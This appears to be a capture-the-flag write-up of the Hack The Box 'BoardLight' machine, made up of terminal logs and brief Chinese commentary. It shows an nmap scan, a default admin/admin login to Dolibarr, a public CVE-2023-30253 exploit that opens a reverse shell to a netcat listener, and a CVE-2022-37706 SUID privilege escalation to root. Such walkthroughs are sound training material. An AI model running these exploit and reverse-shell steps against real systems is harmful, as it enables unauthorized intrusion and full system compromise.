└──╼ [★]$ nmap -sV 10.10.11.11 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-11 06:53 CDT Nmap scan report for 10.10.11.11 Host is up (0.24s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.76 seconds
└──╼ [★]$ echo"10.10.11.11 crm.board.htb" | sudo tee -a /etc/hosts 10.10.11.11 crm.board.htb
用瀏覽器訪問 crm.board.htb 會看到一個登入頁面:
看到 title 是 Dolibarr,上網查一下這是什麼:
Dolibarr ERP CRM is an open source, free software package for companies of any size, foundations or freelancers. It includes different features for enterprise resource planning (ERP) and customer relationship management (CRM) but also other features for different activities.
Login/password of Dolibarr ERP & CRM: - If you did not change it, login is admin and password is the same than the one sent by email for your dashboard access, once your instance was created. Take a look into your message box to retreive it. EMail topic should start with “Welcome to Dolicloud”.
---[Reverse Shell Exploit for Dolibarr <= 17.0.0 (CVE-2023-30253)]---
positional arguments: hostname Target hostname username Username of Dolibarr ERP/CRM password Password of Dolibarr ERP/CRM lhost Listening host for reverse shell lport Listening port for reverse shell
options: -h, --help show this help message and exit ┌─[sg-vip-2]─[10.10.14.22]─[kazma@htb-jejtlehtvs]─[~/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253] └──╼ [★]$ python3 exploit.py http://crm.board.htb admin admin 10.10.14.22 4444 [*] Trying authentication... [**] Login: admin [**] Password: admin [*] Trying created site... [*] Trying created page... [*] Trying editing page and call reverse shell... Press Ctrl+C after successful connection
Reverse shell:
1 2 3 4 5 6
└──╼ [★]$ nc -nlvp 4444 listening on [any] 4444 ... connect to [10.10.14.22] from (UNKNOWN) [10.10.11.11] 44222 bash: cannot set terminal process group (893): Inappropriate ioctl for device bash: no job control in this shell www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$
└──╼ [★]$ ssh [email protected] The authenticity of host '10.10.11.11 (10.10.11.11)' can't be established. ED25519 key fingerprint is SHA256:xngtcDPqg6MrK72I6lSp/cKgP2kwzG6rx2rlahvu/v0. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.11.11' (ED25519) to the list of known hosts. [email protected]'s password:
The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
larissa@boardlight:~$ vi exploit.sh larissa@boardlight:~$ chmod +x exploit.sh larissa@boardlight:~$ ./exploit.sh CVE-2022-37706 [*] Trying to find the vulnerable SUID file... [*] This may take few seconds... [+] Vulnerable SUID binary found! [+] Trying to pop a root shell! [+] Enjoy the root shell :) mount: /dev/../tmp/: can't find in /etc/fstab. # whoami root # find / -name "root.txt" /root/root.txt